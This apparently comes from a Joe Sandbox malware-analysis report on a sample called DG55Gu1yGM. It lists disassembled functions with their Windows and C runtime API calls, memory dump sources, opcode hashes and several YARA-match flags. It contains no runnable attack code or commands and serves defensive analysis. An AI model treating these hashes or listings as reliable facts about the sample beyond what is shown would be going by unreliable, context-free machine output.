                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                        • String ID: 8JV
                                                                                                                                                                                                                                        • API String ID: 776569668-1571241588
                                                                                                                                                                                                                                        • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                        • Instruction ID: 2553f371f7fcd8ed3987e2465633d6fecf7e22fdbd4e0dd0ef6c31112bbbdc45
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5EF030B0D007509BAA226F19AC414053B60AF2D727B04626BF41797273C738D952DF8E
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                          • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                          • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                        • _memcmp.LIBVCRUNTIME ref: 0043116C
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 004311DD
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 004311F6
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00431228
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00431231
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0043123D
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free$ErrorLast$_memcmp
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4275183328-0
                                                                                                                                                                                                                                        • Opcode ID: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
                                                                                                                                                                                                                                        • Instruction ID: 3f2797ad77f757c3ae12916b07ca9a57840cbe3c0d6446731fa2169183c3460f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 57B13975A016199FDB24DF18C884AAEB7B4FF48314F1086EEE909A7360D775AE90CF44
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,021525EC,00000001,00000001,?), ref: 021523F5
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,021525EC,00000001,00000001,?,?,?,?), ref: 0215247B
                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 02152575
                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 02152582
                                                                                                                                                                                                                                          • Part of subcall function 0215390E: RtlAllocateHeap.NTDLL(00000000,0212DAD7,00000000), ref: 02153940
                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 0215258B
                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 021525B0
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1414292761-0
                                                                                                                                                                                                                                        • Opcode ID: 089065164f7acbcee2a009b1ab595d824f5b463daa05b22f9118c45ebaa118bc
                                                                                                                                                                                                                                        • Instruction ID: e98950377e1442dc3707c3dc34fb4a75437921014336a096e8d7f9437cfde6db
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 089065164f7acbcee2a009b1ab595d824f5b463daa05b22f9118c45ebaa118bc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA51B173A60226EFDB258F64CC60EAF77AAEB44754F2546A8FC24D7150DBB4DC40CA90
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __cftoe
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4189289331-0
                                                                                                                                                                                                                                        • Opcode ID: 6290ddc8ebea7097b1647a61380f344cd02ada4a64146fe838c0f2f7cf2ccb9a
                                                                                                                                                                                                                                        • Instruction ID: c090051b9e0b3fb34ec80d64b3a6221d45682efaec1f360175ac73d10a66849e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6290ddc8ebea7097b1647a61380f344cd02ada4a64146fe838c0f2f7cf2ccb9a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F2510576980205EFDF249F688C44FAE77AAFF48374F544269F82DD6181EF31D9018AA4
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 02143051
                                                                                                                                                                                                                                          • Part of subcall function 02138AB2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 02138ABD
                                                                                                                                                                                                                                        • SafeSQueue.LIBCONCRT ref: 0214306A
                                                                                                                                                                                                                                        • Concurrency::location::_Assign.LIBCMT ref: 0214312A
                                                                                                                                                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0214314B
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 02143159
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3496964030-0
                                                                                                                                                                                                                                        • Opcode ID: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
                                                                                                                                                                                                                                        • Instruction ID: a59c9083411b37e7c858f9495cc516635045321fc942d25b6db84e045e7e18ab
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2831D331A406119FCB29EF74C844B6AB7B2FF44720F2546A9E81A9B251DF70E945CFD0
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • FindSITargetTypeInstance.LIBVCRUNTIME ref: 02148F77
                                                                                                                                                                                                                                        • FindMITargetTypeInstance.LIBVCRUNTIME ref: 02148F90
                                                                                                                                                                                                                                        • FindVITargetTypeInstance.LIBVCRUNTIME ref: 02148F97
                                                                                                                                                                                                                                        • PMDtoOffset.LIBCMT ref: 02148FB6
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FindInstanceTargetType$Offset
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1467055271-0
                                                                                                                                                                                                                                        • Opcode ID: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
                                                                                                                                                                                                                                        • Instruction ID: a4ffea9d599d67290872933117d673b6ec33001b8715d9164d5a2a152ae5e845
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 52212B72A842059FDF18DF68DC45EAE77B6EF44750B15832AE91C93580EF31E901CA94
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1687354797-0
                                                                                                                                                                                                                                        • Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                                                                                                                                                                                        • Instruction ID: c4ab08959bf19873d5a5957821a141eeeeeef892072d7081a3f1ca23daf5b54a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A219471C84268AEDF15EBB4E844BDEB7FAAF08325F544019F404B7180DB749A588B65
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,02149038,021469C9,02160907,00000008,02160C6C,?,?,?,?,02143CB2,?,?,0045A064), ref: 0214904F
                                                                                                                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0214905D
                                                                                                                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02149076
                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,02149038,021469C9,02160907,00000008,02160C6C,?,?,?,?,02143CB2,?,?,0045A064), ref: 021490C8
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3852720340-0
                                                                                                                                                                                                                                        • Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                                                                                                                                                        • Instruction ID: 66ffce238b8d109233cc1d69ed3f6851066a1bc5ecb6181041923873127f65eb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9701F7322C97116EA7282BF4AC88E672749EF45776B300339F92C472E0EF12A8105989
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,226C369D), ref: 00428DE8
                                                                                                                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DF6
                                                                                                                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E0F
                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,226C369D), ref: 00428E61
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3852720340-0
                                                                                                                                                                                                                                        • Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                                                                                                                                                        • Instruction ID: 8d354f8c373550ad8ca54886775f1e1f72959a5719103f68ef850459183cda9d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5801283630A7316EA7242BF57C8956F2744EB0677ABA0033FF414913E2EF194C21950D
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 02124FCA
                                                                                                                                                                                                                                        • int.LIBCPMT ref: 02124FE1
                                                                                                                                                                                                                                          • Part of subcall function 0212BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0212BFD4
                                                                                                                                                                                                                                          • Part of subcall function 0212BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0212BFEE
                                                                                                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 02124FEA
                                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0212501B
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 02125031
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0212504F
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2243866535-0
                                                                                                                                                                                                                                        • Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                                                                                                                                                        • Instruction ID: 89706a8a916db62eb132f9b1f4a4b96784c6be632b12e1a502c4323787b5249f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF11C232980238AFCB29EB64CC40BAE77B2BF04354F550519F415AB2D0DB749A19CFD4
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00404D63
                                                                                                                                                                                                                                        • int.LIBCPMT ref: 00404D7A
                                                                                                                                                                                                                                          • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                          • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 00404D83
                                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00404DB4
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00404DCA
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00404DE8
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2243866535-0
                                                                                                                                                                                                                                        • Opcode ID: f6c010546c9a6aab71d76984e3b3a56c50bb37f9d4fd5e14535c7cf2849aeaa2
                                                                                                                                                                                                                                        • Instruction ID: 50d9ff0d4b57cf36d5715a51c78873cd43da78958b4b2dc720108d245924cf68
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f6c010546c9a6aab71d76984e3b3a56c50bb37f9d4fd5e14535c7cf2849aeaa2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB11A0B2D101299BCB15EBA4C841AAE77B0AF44318F14457FE911BB2D2DB3C9A058BDD
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0212C401
                                                                                                                                                                                                                                        • int.LIBCPMT ref: 0212C418
                                                                                                                                                                                                                                          • Part of subcall function 0212BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0212BFD4
                                                                                                                                                                                                                                          • Part of subcall function 0212BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0212BFEE
                                                                                                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0212C421
                                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0212C452
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0212C468
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0212C486
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2243866535-0
                                                                                                                                                                                                                                        • Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                                                                                                                                                        • Instruction ID: fbb7e9ef5ab90cef67f37a3d31bff7b8353132e40064778a780f2b1e7b66f473
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2311CE728802389FCB19EBA4D804AEE7772AF44714F61051AF511AB2D0DF349A19CFD4
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 02124E8C
                                                                                                                                                                                                                                        • int.LIBCPMT ref: 02124EA3
                                                                                                                                                                                                                                          • Part of subcall function 0212BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0212BFD4
                                                                                                                                                                                                                                          • Part of subcall function 0212BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0212BFEE
                                                                                                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 02124EAC
                                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 02124EDD
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 02124EF3
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 02124F11
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2243866535-0
                                                                                                                                                                                                                                        • Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                                                                                                                                                        • Instruction ID: 9c76238712b68e493fdd392e0cfc861d8c8fa69f6d5121d94260d1d3ff38605f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B411AC328802399FCB19EBA4D800AAE77B2AF44314F240519F411A72D0DB789A19CF95
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040C19A
                                                                                                                                                                                                                                        • int.LIBCPMT ref: 0040C1B1
                                                                                                                                                                                                                                          • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                          • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0040C1BA
                                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0040C1EB
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C201
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C21F
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2243866535-0
                                                                                                                                                                                                                                        • Opcode ID: 10aa9e1201f5f3f7416b02b9edb1f058c39ec3f43568e2087a01ea537f42d87b
                                                                                                                                                                                                                                        • Instruction ID: ee53003dfc9470fa79d8cc5ab50186f75a1860792542933f5f9c6443a3e70220
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 10aa9e1201f5f3f7416b02b9edb1f058c39ec3f43568e2087a01ea537f42d87b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2119172900219EBCB15EB90C881AAD7760AF44314F14053FE811BB2D2DB389A059B99
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 004054E3
                                                                                                                                                                                                                                        • int.LIBCPMT ref: 004054FA
                                                                                                                                                                                                                                          • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                          • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 00405503
                                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00405534
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0040554A
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00405568
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2243866535-0
                                                                                                                                                                                                                                        • Opcode ID: e9dd33c628eb01dd71e58123e4f12a767f9f28c2de7f76e3991a704fb5513a9b
                                                                                                                                                                                                                                        • Instruction ID: 21a092b80c120d3a1799ad65edf81cfe58c90a4d0a542ae4cd53e0a409a0227e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e9dd33c628eb01dd71e58123e4f12a767f9f28c2de7f76e3991a704fb5513a9b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A711AC72D10628ABCB15EBA4C801AAE7774EF44318F14053EE811BB2D2DB389A058F9C
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00404C25
                                                                                                                                                                                                                                        • int.LIBCPMT ref: 00404C3C
                                                                                                                                                                                                                                          • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                          • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 00404C45
                                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00404C76
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00404C8C
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00404CAA
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2243866535-0
                                                                                                                                                                                                                                        • Opcode ID: 4b9b4a6b9052ba89dd6e642b69d507a7ec0134249dae4d4270acfb68f36c0c35
                                                                                                                                                                                                                                        • Instruction ID: 1aa241efc112286da59c73bb00310cdec327cb4216d8ea75c5d160ea2c1741d7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4b9b4a6b9052ba89dd6e642b69d507a7ec0134249dae4d4270acfb68f36c0c35
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5311E0B2C002289BCB11EBA0C801AEE7774AF44318F10053FE911BB2D1CB389E058B98
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 00404E6A
                                                                                                                                                                                                                                          • Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E
                                                                                                                                                                                                                                        • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EB5
                                                                                                                                                                                                                                        • __Getcoll.LIBCPMT ref: 00404EC4
                                                                                                                                                                                                                                        • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ED4
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
